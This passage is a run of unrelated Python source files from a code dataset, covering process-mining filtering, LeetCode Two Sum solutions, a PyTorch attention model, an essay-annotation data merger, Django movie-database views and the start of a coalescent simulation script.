Category'] == '3-way match, invoice before GR']\n threewayafter = df[df['case Item Category'] == '3-way match, invoice after GR']\n consignment = df[df['case Item Category'] == 'Consignment']\n twoway = df[df['case Item Category'] == '2-way match']\n\n ################# category 1: 3 way before ######################\n last_data1 = threewaybefore[\n ['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean1 = ~last_data1.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last1 = last_data1[boolean1]\n\n # get more insight\n df_group1 = df_last1.groupby(['event concept:name']).count()\n df_group1['percentage'] = (df_group1['eventID '] / df_last1.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group1.sort_values(by='percentage', ascending=False)\n df_group1[['percentage']]\n\n # select non-partial events of cases\n bool1_1 = (df_last1['event concept:name'] == 'Clear Invoice')\n bool1_2 = (df_last1['event concept:name'] == 'Cancel Goods Receipt')\n bool1_3 = (df_last1['event concept:name'] == 'Record Goods Receipt')\n bool1_4 = (df_last1['event concept:name'] == 'Delete Purchase Order Item')\n bool1_5 = (df_last1['event concept:name'] == 'Change Approval for Purchase Order')\n df_last_no_partial1 = df_last1[bool1_1 + bool1_2 + bool1_3 + bool1_4 + bool1_5]\n\n # select all events of non-partial cases\n threewaybefore = threewaybefore[\n threewaybefore['case concept:name'].isin(list(df_last_no_partial1['case concept:name']))]\n\n ############## category 2: 3 way after ##############\n last_data2 = threewayafter[\n ['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean2 = ~last_data2.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last2 = last_data2[boolean2]\n\n # get more insight\n df_group2 = df_last2.groupby(['event concept:name']).count()\n df_group2['percentage'] = (df_group2['eventID '] / df_last2.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group2.sort_values(by='percentage', ascending=False)\n df_group2[['percentage']]\n\n # select non-partial events of cases\n bool2_1 = (df_last2['event concept:name'] == 'Clear Invoice')\n bool2_2 = (df_last2['event concept:name'] == 'Cancel Invoice Receipt')\n bool2_3 = (df_last2['event concept:name'] == 'Record Invoice Receipt')\n bool2_4 = (df_last2['event concept:name'] == 'Delete Purchase Order Item')\n bool2_5 = (df_last2['event concept:name'] == 'Change Approval for Purchase Order')\n bool2_6 = (df_last2['event concept:name'] == 'Record Service Entry Sheet')\n df_last_no_partial2 = df_last2[bool2_1 + bool2_2 + bool2_3 + bool2_4 + bool2_5 + bool2_6]\n\n # select all events of non-partial cases\n threewayafter = threewayafter[\n threewayafter['case concept:name'].isin(list(df_last_no_partial2['case concept:name']))]\n\n ############## category 3: consignment #############\n last_data3 = consignment[['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean3 = ~last_data3.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last3 = last_data3[boolean3]\n\n # get more insight\n df_group3 = df_last3.groupby(['event concept:name']).count()\n df_group3['percentage'] = (df_group3['eventID '] / df_last3.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group3.sort_values(by='percentage', ascending=False)\n df_group3[['percentage']]\n\n # select non-partial events of cases\n bool3_1 = (df_last3['event concept:name'] == 'Cancel Goods Receipt')\n bool3_2 = (df_last3['event concept:name'] == 'Record Goods Receipt')\n bool3_3 = (df_last3['event concept:name'] == 'Delete Purchase Order Item')\n df_last_no_partial3 = df_last3[bool3_1 + bool3_2 + bool3_3]\n\n # select all events of non-partial cases\n consignment = consignment[consignment['case concept:name'].isin(list(df_last_no_partial3['case concept:name']))]\n\n ########## category 4: 2 way #############\n last_data4 = twoway[['eventID ', 'case concept:name', 'event concept:name', 'event time:timestamp']].copy()\n boolean4 = ~last_data4.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last4 = last_data4[boolean4]\n\n # get more insight\n df_group4 = df_last4.groupby(['event concept:name']).count()\n df_group4['percentage'] = (df_group4['eventID '] / df_last4.groupby(['event concept:name']).count().sum()[\n 'eventID ']) * 100\n df_group4.sort_values(by='percentage', ascending=False)\n df_group4[['percentage']]\n\n # select non-partial events of cases\n bool4_1 = (df_last4['event concept:name'] == 'Clear Invoice')\n bool4_2 = (df_last4['event concept:name'] == 'Record Invoice Receipt')\n bool4_3 = (df_last4['event concept:name'] == 'Delete Purchase Order Item')\n bool4_4 = (df_last4['event concept:name'] == 'Change Approval for Purchase Order')\n df_last_no_partial4 = df_last4[bool4_1 + bool4_2 + bool4_3 + bool4_4]\n\n # select all events of non-partial cases\n twoway = twoway[twoway['case concept:name'].isin(list(df_last_no_partial4['case concept:name']))]\n\n df = pd.concat([threewaybefore, threewayafter, consignment, twoway])\n return df\n\n else:\n print(\"No preset dataset found, will drop partial cases on a 20 percent threshold\") \n # if it is an arbritary dataset, use threshold of 20 percent\n last_data = df.copy()\n boolean = ~last_data.duplicated(['case concept:name'], keep='last') # takes last appearances of the cases\n df_last = last_data[boolean]\n\n events_kept = df_last['event concept:name'].value_counts() / len(df_last)\n events_kept = events_kept.index[events_kept >= 0.20]\n\n df_last_no_partial = df_last[df_last['event concept:name'].isin(events_kept)]\n df = df[df['case concept:name'].isin(df_last_no_partial['case concept:name'].unique())]\n return df","sub_path":"processminingtool/partialcases.py","file_name":"partialcases.py","file_ext":"py","file_size_in_byte":14715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"515362462","text":"'''\nhttps://leetcode.com/problems/two-sum/\n\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n\n你可以假设每种输入只会对应一个答案。但是,你不能重复利用这个数组中同样的元素。\n\nExample:\n\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\n'''\n\n# 思路1\n'''\n暴力法\n\n\n遍歷所有數組\n外層loop i:n-1\n 內層loop 從 i+1:n\n 由於假設每種輸入只會對應一組答案,所以\n 找到相加等於目標數字立即返回(i,j)\n\ntime complexity: O(n^2)\nleetcode result:\nAccepted\t5988 ms\t13.7 MB\n'''\n\n\nclass Solution1:\n def twoSum(self, nums, target: int):\n n = len(nums)\n for i in range(n - 1):\n for j in range(i + 1, n):\n if nums[i] + nums[j] == target:\n return [i, j]\n\n\n'''\n思路2:\n先將裡面的元素由小到大做排序,時間複雜度為logN\n再用左右夾逼的方式移動元素\n若兩元素相加> target \n則把最右邊的j 往左移\n若兩元素相加< target\n則把最左的元素向右移\n直到兩指針相交 (i==j)\n\ntime complexity: O(N) \n\nleetcode result:\nRuntime: 52 ms, faster than 56.49% of Python3 online submissions for Two Sum.\nMemory Usage: 14 MB, less than 65.58% of Python3 online submissions for Two Sum.\n'''\n\n\nclass Solution2:\n def twoSum(self, nums, target: int):\n orignal_list = nums.copy()\n n = len(nums)\n nums.sort()\n i = 0\n j = n - 1\n while True:\n if (nums[i] + nums[j] > target):\n j = j - 1\n elif (nums[i] + nums[j] < target):\n i = i + 1\n else:\n break;\n return self._find_index(orignal_list, nums[i], nums[j])\n\n def _find_index(self, input_list, a, b):\n index_a = input_list.index(a)\n index_b = input_list.index(b)\n # 去重\n if index_a == index_b:\n [index_a, index_b] = [i for i, x in enumerate(input_list) if x == a]\n return [index_a, index_b]\n\n\n'''\n解法3 空間換時間(字典)\n這邊哈希表我還不太熟,待以後來補全解法\n目前先用空間換時間的做法來試試\n\n想法為用字典來儲存target - list 中的每一個元素\n如果之後遇到list 中的新元素存在於字典中,表示這個新元素與之前的結果是相匹配的\n===========\n一開始先檢查字典中是否有當前list中的元素\n\n若有 則返回字典的key 值與當前list的位址 (表示湊到一對)\n若無 則將目前list的位址與減完的結果一併存於字典中,以利後續查找\n\n此法只比前面快了一點點(4ms) 、時間複雜度應為 O(N)\n多用了0.2mb 的ram\n但這取決於array 的大小\n不過代碼是簡潔了很多\n\nRuntime: 48 ms, faster than 79.16% of Python3 online submissions for Two Sum.\nMemory Usage: 14.2 MB, less than 56.04% of Python3 online submissions for Two Sum.\n\n'''\n\n\nclass Solution3:\n def twoSum(self, nums, target: int):\n temp_dict = {}\n for key, item in enumerate(nums):\n check_result = target - item\n if item in temp_dict:\n return [temp_dict[item], key]\n else:\n temp_dict[check_result] = key\n\n\n\n\nif __name__ == \"__main__\":\n # k=[4,5,1,3,2]\n # k.sort()\n # print(k)3\n s1 = Solution3().twoSum([4, 3, 3], 6)\n print(s1)\n","sub_path":"Week_01/G20190343010191/LeetCode_1_191.py","file_name":"LeetCode_1_191.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"69513597","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 15:50:14 2019\n\n@author: amrita\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom utils import one_hot\nimport numpy as np\nimport torchvision.models as models\nimport os\n\nclass AttributeCatalog():\n \n def __init__(self, opt, vocab_size):\n self.net = _Net(opt, vocab_size)\n if opt.load_checkpoint_path:\n try:\n print('loading checkpoint from %s', os.path.join('checkpoints',opt.load_checkpoint_path))\n checkpoint = torch.load(os.path.join('checkpoints',os.path.join(opt.load_checkpoint_path, 'checkpoint_best.pt')))\n self.net.load_state_dict(checkpoint['model_state'])\n print ('Model loaded')\n except:\n print ('Model initialized... Not loaded')\n self.num_classes = vocab_size\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.net.parameters(), lr=opt.learning_rate)\n self.use_cuda = len(opt.gpu_ids) > 0 and torch.cuda.is_available()\n self.gpu_ids = opt.gpu_ids\n if self.use_cuda:\n self.net.cuda(opt.gpu_ids[0])\n print ('transferred model to gpu')\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n self.input, self.label, self.label_onehot = None, None, None\n \n def _to_var(self, x): \n if self.use_cuda:\n x = x.cuda()\n return Variable(x)\n \n def set_input(self, context_word_glove_emb, context_attention_vector, x, y=None):\n self.input = self._to_var(x)\n self.context_word_glove_emb = self._to_var(context_word_glove_emb)\n self.context_attention_vector = self._to_var(context_attention_vector)\n if y is not None:\n self.label = self._to_var(y)\n self.label_onehot = one_hot(self.label, self.label.size(0), self.num_classes, self.device).long()\n \n \n def forward(self):\n self.pred = self.net(self.input, self.context_word_glove_emb, self.context_attention_vector)\n if self.label_onehot is not None:\n self.loss = self.criterion(self.pred, self.label)\n\n def get_loss(self):\n return self.loss.data\n \n def compute_score(self):\n logits = torch.max(self.pred, 1)[1].cpu().numpy()\n label = self.label.cpu().numpy()\n score = (logits==label).astype(np.int).sum() / label.shape[0]\n return score\n \n def step(self):\n self.optimizer.zero_grad()\n self.forward()\n self.loss.backward()\n nn.utils.clip_grad_norm_(self.net.parameters(), 0.25)\n self.optimizer.step()\n return\n \n def get_pred(self):\n return self.pred.data.cpu().numpy()\n \n def eval_mode(self):\n self.net.eval()\n \n def train_mode(self):\n self.net.train()\n \n def save_checkpoint(self, save_path):\n checkpoint = {\n 'model_state': self.net.cpu().state_dict()\n }\n torch.save(checkpoint, save_path)\n if self.use_cuda:\n self.net.cuda(self.gpu_ids[0])\n \n'''\nclass _Net(nn.Module):\n\n def __init__(self, hidden_dim):\n super(_Net, self).__init__()\n self.hidden_dim = hidden_dim\n self.num_classes = 2\n \n self.leaky_relu = nn.LeakyReLU()\n self.relu = nn.ReLU()\n \n layers = []\n layers.append(nn.Linear(2048, self.hidden_dim))\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.LeakyReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.LeakyReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n layers.append(nn.ReLU())\n layers.append(nn.Linear(self.hidden_dim, self.hidden_dim))\n self.main = nn.Sequential(*layers)\n self.final_layer = nn.Linear(self.hidden_dim, self.num_classes)\n \n def forward(self, x):\n x = self.main(x)\n output = self.final_layer(x)\n out_dist = F.softmax(output, dim=1)\n return out_dist\n'''\n\n\nclass _Net(nn.Module):\n \n def __init__(self, opt, vocab_size):\n super(_Net, self).__init__()\n self.use_cuda = len(opt.gpu_ids) > 0 and torch.cuda.is_available()\n self.gpu_ids = opt.gpu_ids\n if self.use_cuda:\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n self.input_channels = opt.input_channels\n self.img_feat_size = opt.image_feature_size\n self.hidden_size = opt.hidden_size\n self.cluster_classify = opt.cluster_classify\n self.common_emb_size = opt.common_embedding_size\n self.glove_emb_size = opt.glove_embedding_size\n self.fc1_size = opt.fc1_size\n self.fc2_size = opt.fc2_size\n self.num_att_layers = opt.num_att_layers\n self.tanh = nn.Tanh\n self.dropout = nn.Dropout(0.2)\n self.softmax = nn.Softmax(dim=1)\n self.vocab_size = vocab_size\n resnet = models.resnet34(pretrained=True)\n resnet_layers = list(resnet.children())\n #for layer in resnet_layers:\n # for param in layer.parameters():\n # param.requires_grad = False\n # remove the last two layer\n resnet_layers.pop()\n resnet_layers.pop()\n # remove the first layer as we take a 6-channel input\n resnet_layers.pop(0)\n resnet_layers.insert(0, nn.Conv2d(self.input_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False))\n self.resnet_layers_seq = nn.Sequential(*resnet_layers)\n self.image_pooling_layer = nn.AdaptiveAvgPool2d(output_size=(1, 1))\n self.concept_image_att_mat = nn.Linear(self.glove_emb_size, self.img_feat_size)\n layers1 = []\n layers1.append(nn.Linear(self.img_feat_size, self.hidden_size))\n layers1.append(nn.LeakyReLU())\n layers1.append(nn.Dropout(0.1))\n layers2 = []\n layers2.append(nn.Linear(self.glove_emb_size, self.hidden_size))\n layers2.append(nn.LeakyReLU())\n layers2.append(nn.Dropout(0.1))\n self.layers1_seq = nn.Sequential(*layers1)\n self.layers2_seq = nn.Sequential(*layers2)\n self.img_linear_layers = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.concept_linear_layers = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.img_concept_linear_layers = nn.ModuleList([nn.Linear(self.common_emb_size, 1) for i in range(self.num_att_layers)])\n final_layers = []\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.hidden_size, self.fc1_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.fc1_size, self.fc2_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n final_layers.append(nn.Linear(self.fc2_size, self.vocab_size))\n final_layers.append(nn.LeakyReLU())\n final_layers.append(nn.Dropout(0.1))\n #final_layers.append(nn.Sigmoid())\n self.final_layers_seq = nn.Sequential(*final_layers)\n '''\n if not self.cluster_classify:\n self.cluster_embedding = nn.Parameter(torch.tensor(cluster_embedding_mat), requires_grad=True)\n layers1_2 = []\n layers1_2.append(nn.Linear(self.img_feat_size, self.hidden_size))\n layers1_2.append(nn.LeakyReLU())\n layers1_2.append(nn.Dropout(0.2))\n self.layers1_2_seq = nn.Sequential(*layers1_2)\n layers2_2 = []\n layers2_2.append(nn.Linear(self.glove_emb_size, self.hidden_size))\n layers2_2.append(nn.LeakyReLU())\n layers2_2.append(nn.Dropout(0.2))\n self.layers2_2_seq = nn.Sequential(*layers2_2)\n self.img_linear_layers2 = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.concept_linear_layers2 = nn.ModuleList([nn.Linear(self.hidden_size, self.common_emb_size) for i in range(self.num_att_layers)])\n self.img_concept_linear_layers2 = nn.ModuleList([nn.Linear(self.common_emb_size, 1) for i in range(self.num_att_layers)])\n final_layers2 = []\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.hidden_size, self.fc1_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.fc1_size, self.fc2_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n final_layers2.append(nn.Linear(self.fc2_size, self.vocab_size))\n final_layers2.append(nn.LeakyReLU())\n final_layers2.append(nn.Dropout(0.1))\n self.final_layers2_seq = nn.Sequential(*final_layers2)\n print ('initialized _Net model')\n self.attention_weight_mat = torch.tensor(attention_weight_mat, requires_grad=False, device=self.device, dtype=torch.long)\n '''\n print ('initialized _Net model')\n \n def forward(self, img, context_glove_embed, context_attention_vector):\n img_emb = self.resnet_layers_seq(img)\n img_emb_pooled = torch.unsqueeze(torch.squeeze(self.image_pooling_layer(img_emb)), dim=1)\n #img_emb_pooled is of dimension batch_size x 1 x img_feat_size\n concept_emb = self.concept_image_att_mat(context_glove_embed)\n #concept_emb is of dimension batch_size x vocab_size x img_feat_size\n concept_emb = torch.transpose(concept_emb, 2, 1)\n #concept_emb is of dimension batch_size x img_feat_size x vocab_size)\n img_concept_emb = torch.squeeze(torch.bmm(img_emb_pooled, concept_emb))\n #img_concept_emb is of dimension batch_size x vocab_size\n img_concept_att = self.softmax(img_concept_emb)\n img_concept_att = torch.unsqueeze(self.mask_attention(img_concept_att, context_attention_vector), dim=1)\n #img_concept_att is of dimension batch_size x 1 x vocab_size\n img_concept_emb = torch.squeeze(torch.bmm(img_concept_att, context_glove_embed))\n #img_concept_emb is of dimension batch_size x glove_emb_size\n img_emb = torch.transpose(torch.transpose(img_emb, 2, 1), 3, 2).view(-1, 64, self.img_feat_size)\n img_hid = self.layers1_seq(img_emb).view(-1, 64, self.hidden_size)\n #imd_hid is of dimension batch_size x 64 x img_hid_size\n img_concept_hid = self.layers2_seq(img_concept_emb)\n #img_concept_hid is of dimension batch_size x concept_hid_size\n i=0\n for i in range(self.num_att_layers):\n img_common = self.img_linear_layers[i](img_hid)\n #img_common is of dimension batch_size x 64 x common_emb_size\n concept_common = self.concept_linear_layers[i](img_concept_hid)\n #concept_common is of dimension batch_size x common_emb_size\n concept_common = torch.unsqueeze(concept_common, dim=1).repeat(1, 64, 1)\n #concept_common is of dimension batch_size x 64 x common_emb_size\n img_concept_common = self.dropout((img_common+concept_common).tanh())\n #img_concept_common is of dimension batch_size x 64 x common_emb_size\n h = torch.squeeze(self.img_concept_linear_layers[i](img_concept_common), dim=2)\n #h is of dimension batch_size x 64\n p_att = torch.unsqueeze(self.softmax(h), dim=1)\n #p_att is of dimension batch_size x 1 x 64\n img_att = torch.squeeze(torch.bmm(p_att, img_hid), dim=1)\n #img_att is of dimension batch_size x img_hid_size\n if i==(self.num_att_layers-1):\n img_concept_hid = img_att\n #concept_hid is of dimension batch_size x img_hid_size\n else:\n img_concept_hid = img_att+img_concept_hid\n #concept_hid is of dimension batch_size x img_hid_size\n clusters = self.final_layers_seq(img_concept_hid)\n #clusters is of dimension batch_size x cluster_size\n return clusters\n# =============================================================================\n# if self.cluster_classify:\n# return clusters \n# else:\n# clusters_att = self.softmax(clusters)\n# #clusters_att is of dimension batch_size x cluster_size\n# clusters_emb = torch.mm(clusters_att, self.cluster_embedding)\n# #clusters_hid is of dimension batch_size x glove_emb_size\n# img_hid2 = self.layers1_2_seq(img_emb).view(-1, 64, self.hidden_size)\n# concept_hid2 = self.layers2_2_seq(clusters_emb)\n# i=0\n# for i in range(self.num_att_layers):\n# img_common2 = self.img_linear_layers2[i](img_hid2)\n# concept_common2 = self.concept_linear_layers2[i](concept_hid2)\n# concept_common2 = torch.unsqueeze(concept_common2, dim=1).repeat(1, 64, 1)\n# img_concept_common2 = self.dropout((img_common2+concept_common2).tanh())\n# h2 = torch.squeeze(self.img_concept_linear_layers2[i](img_concept_common2), dim=2)\n# p_att2 = torch.unsqueeze(self.softmax(h2), dim=1)\n# img_att2 = torch.squeeze(torch.bmm(p_att2, img_hid2), dim=1)\n# if i==(self.num_att_layers-1):\n# concept_hid2 = img_att2\n# else:\n# concept_hid2 = img_att2 + concept_hid2\n# concepts = self.final_layers2_seq(concept_hid2) \n# concepts_att = self.softmax(concepts)\n# #concepts_att is of dimension batch_size x vocab_size\n# \n# att_weight = torch.unsqueeze(self.attention_weight_mat, dim=0).repeat(concepts_att.size(0), 1)\n# #att_weight is of dimension batch_size x vocab_size\n# att_weight = torch.gather(clusters, dim=1, index=att_weight)\n# #att_weight is of dimension batch_size x vocab_size\n# concepts_att = torch.mul(concepts_att, att_weight)\n# return concepts_att\n# =============================================================================\n \n def mask_attention(self, attention, mask):\n masked_atten = torch.mul(attention, mask)\n num = len(masked_atten.shape)\n l1norm = torch.sum(masked_atten, dim=1)\n stacked_norm = torch.mul(torch.ones_like(masked_atten), torch.unsqueeze(l1norm,num-1))\n masked_atten = torch.where(stacked_norm==0, torch.ones_like(masked_atten), masked_atten)\n new_l1_norm = torch.sum(masked_atten, dim=1)\n masked_atten = masked_atten/new_l1_norm.view([-1,1])\n return masked_atten \n\ndef get_model(opt, vocab_size):\n model = AttributeCatalog(opt, vocab_size)\n return model\n\n \n\n\n\n\n\n","sub_path":"multiclass_unilabel_cce_level2_attribute/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21476016","text":"from os import listdir\nimport json\nimport os\nimport re\n\n#############################################\n# PLEASE SET TO CORRECT PATH BEFORE RUNNING #\n#############################################\nCURRENT_WORKING_DIR = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\nCONST_ESSAYPATH = f'{CURRENT_WORKING_DIR}/../data/ArgumentAnnotatedEssays-2.0/brat-project-final/'\nCONST_SUFFICIENTPATH = f'{CURRENT_WORKING_DIR}/../data/UKP-InsufficientArguments_v1.0/data-tokenized.tsv'\nCONST_CONFIRMATIONBIAS = f'{CURRENT_WORKING_DIR}/../data/UKP-OpposingArgumentsInEssays_v1.0/labels.tsv'\n\n\n# Object based on the sample.json file\nclass OutputObject(object):\n id = \"\"\n title = \"\"\n text = \"\"\n major_claim = []\n claims = []\n premises = []\n confirmation_bias = False # not biased until proven guilty\n paragraphs = []\n\n # The class \"constructor\" - It's actually an initializer\n def __init__(self, essay_id, title, text, major_claim, claims, premises, paragraphs, confirmation_bias):\n self.id = essay_id\n self.title = title\n self.text = text\n self.major_claim = major_claim\n self.claims = claims\n self.premises = premises\n self.paragraphs = paragraphs\n self.confirmation_bias = confirmation_bias\n\n\ndef get_entity_contents(file_content: str, entity_name: str) -> list:\n \"\"\"\n :param file_content: content of the essayXXX.ann\n :param entity_name: MajorClaim or Claim or Premise\n :rtype: list\n :return: list of dicts with span, text of given entity and ann-file content\n \"\"\"\n lines = file_content.split(\"\\n\")\n entity_content = []\n for line in lines:\n if re.search(r'\\b' + entity_name + r'\\b', line):\n line = line.split(\"\\t\")\n span_start = line[1].split(\" \")[1]\n span_end = line[1].split(\" \")[2]\n entity_content = entity_content + [{\"span\": [span_start, span_end], \"text\": line[2]}]\n return entity_content\n\n\ndef get_paragraphs_and_sufficient_per_id(essay_id: str) -> list:\n \"\"\"\n :rtype: list\n :param essay_id: ID as string including preceding zeros\n :return: list of dicts of the paragraphs with text and sufficient parameter\n \"\"\"\n tsv_file = open(CONST_SUFFICIENTPATH, \"r\", errors='ignore') # Has some weird characters, this removes them\n file_content = tsv_file.read()\n lines = file_content.split(\"\\n\") # Format in first Line: ESSAY\tARGUMENT\tTEXT\tANNOTATION\n lines.pop(0)\n paragraphs = []\n for line in lines:\n line = line.split(\"\\t\")\n if int(line[0]) == int(essay_id):\n sufficient = True\n if \"insufficient\" in line[3]:\n sufficient = False\n paragraphs = paragraphs + [{\"text\": line[2], \"sufficient\": sufficient}]\n return paragraphs\n\n\ndef get_confirmation_bias(essay_id: str) -> bool:\n \"\"\"\n :rtype: bool\n :param essay_id: ID as string including preceding zeros\n :return: true if confirmation bias true\n \"\"\"\n tsv_file = open(CONST_CONFIRMATIONBIAS, \"r\")\n file_content = tsv_file.read()\n lines = file_content.split(\"\\n\") # Format in first Line: id label\n lines.pop(0)\n for line in lines:\n line = line.split(\"\\t\")\n if line[0].split(\"essay\")[1] == essay_id:\n if line[1] == \"positive\":\n return True\n else:\n return False\n\n\ndef get_all_essay_data() -> list:\n # get all essayXXX.txt file names as basis\n essay_texts = list(filter(lambda x: \".txt\" in x, listdir(CONST_ESSAYPATH)))\n essay_texts.sort()\n all_output_elements = []\n # go through all essayXXX.txt files and gather all corresponding information\n for fileName in essay_texts:\n text_file = open(CONST_ESSAYPATH + fileName, \"r\", encoding=\"utf8\")\n file_id = fileName.split(\"essay\")[1].split(\".txt\")[0] # get ID of current file\n\n # read text-file and clean\n content = text_file.read()\n content = content.replace(\"\\n \\n\", \"\\n\\n\") # slight cleaning: essay140.txt has \"/n /n\" with a space\n content = content.replace(\"\\n \\n\", \"\\n\\n\") # slight cleaning: essay402.txt has \"/n /n\" with a space\n\n # title is contained in first part of the text-file\n title = content.split(\"\\n\\n\")[0]\n # all text is in the second part of the text-file\n text = content.split(\"\\n\\n\")[1]\n\n # gather corresponding essayXXX.ann file\n file_ann = open(CONST_ESSAYPATH + \"essay\" + file_id + \".ann\", \"r\")\n ann_content = file_ann.read()\n\n major_claims = get_entity_contents(ann_content, \"MajorClaim\")\n claims = get_entity_contents(ann_content, \"Claim\")\n premises = get_entity_contents(ann_content, \"Premise\")\n\n paragraphs = get_paragraphs_and_sufficient_per_id(file_id)\n\n bias = get_confirmation_bias(file_id)\n\n # create a output object as contained in output.json and save it\n obj = OutputObject(file_id, title, text, major_claims, claims, premises, paragraphs, bias)\n all_output_elements = all_output_elements + [obj]\n return all_output_elements\n\n\ndef main():\n print(\"Started to create the unified data file...\")\n all_essay_data = get_all_essay_data()\n # write\n json_dump = json.dumps([element.__dict__ for element in all_essay_data], indent=4, ensure_ascii=False)\n with open(f'{CURRENT_WORKING_DIR}/../data/unified_data.json', \"w\") as outfile:\n outfile.write(json_dump)\n print(\"Successfully created unified data in '/data/unified_data.json'.\")\n\n\n# run main function\nif __name__ == '__main__':\n main()\n","sub_path":"assignment01/data-acquisition-assignment/code/data-unification.py","file_name":"data-unification.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458732608","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .models import Movies\n\ndef populate(request):\n return_msg = \"\"\n data = [{'episode_nb' : 1, 'title' : 'The Phantom Menace', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '1999-05-19'},\n {'episode_nb' : 2, 'title' : 'Attack of the Clones', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '2002-05-16'},\n {'episode_nb' : 3, 'title' : 'Revenge of the Sith', 'director' : 'George Lucas', 'producer' : 'Rick McCallum', 'release_date' : '2005-05-19'},\n {'episode_nb' : 4, 'title' : 'A New Hope', 'director' : 'George Lucas', 'producer' : 'Gary Kurtz, Rick McCallum', 'release_date' : '1977-05-25'},\n {'episode_nb' : 5, 'title' : 'The Empire Strikes Back', 'director' : 'Irvin Kershner', 'producer' : 'Gary Kurtz, Rick McCallum', 'release_date' : '1980-05-17'},\n {'episode_nb' : 6, 'title' : 'Return of the Jedi', 'director' : 'Richard Marquand','producer' : 'Howard G. Kazanjian, George Lucas, Rick McCallum', 'release_date' : '1983-05-25'},\n {'episode_nb' : 7, 'title' : 'The Force Awakens', 'director' : 'J. J. Abrams', 'producer' : 'Kathleen Kennedy, J. J. Abrams, Bryan Burk', 'release_date' : '2015-12-11'},\n ]\n\n for i in data:\n try:\n Movies.objects.create(episode_nb=i['episode_nb'], title=i['title'], director=i['director'],\n producer=i['producer'], release_date=i['release_date'])\n return_msg += \"OK\" + \"
    \"\n except Exception as err:\n return_msg += str(err) + \"
    \"\n\n return HttpResponse(return_msg)\n\ndef display(request):\n try:\n data = Movies.objects.all()\n except Exception:\n return HttpResponse(\"No data available\")\n\n return render(request, 'ex05/display_movies.html', {'data': data})\n\ndef remove_page(request, data):\n return render(request, 'ex05/delete_movies.html', {'data': data})\n\ndef remove_movie(request):\n try:\n data = Movies.objects.all()\n except Exception as err:\n return HttpResponse(\"No data available\")\n\n if request.method != 'POST':\n return remove_page(request, data)\n\n delete_str = Movies.objects.get(episode_nb=request.POST['movies'])\n delete_str.delete()\n\n return render(request, 'ex05/delete_movies.html', {'data': data})","sub_path":"day-05/d05/ex05/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"563816910","text":"\n# coding: utf-8\n\n# In[161]:\n\nimport numpy as np\nfrom Bio import Phylo\nfrom Bio.Phylo import PhyloXMLIO\nfrom io import StringIO\nfrom pygraphviz import *\nimport networkx, pylab\nfrom scipy.special import comb\nfrom scipy.stats import poisson\n\n\n# In[162]:\n\n#### initialization\n#mode = int(input('Enter the coalescent model number (1 for Kingman, 2 for Bolthausen-Sznitman Coalescent): '))\n#while mode < 1 or mode > 2:\n# print(\"Wrong Input!\")\n# mode = int(input('Enter the coalescent model number (1 for Kingman, 2 for Bolthausen-Sznitman Coalescent): '))\n#sample_size = int(input('Enter the value of total sample size: '))\n#while sample_size <= 1:\n# print(\"Wrong Input!\")\n# sample_size = int(input('Enter the value of total sample size: '))\nmode = 3\nsample_size = 100\nidentity_count = 1;\n#coalescent_list = [];#keeps track of 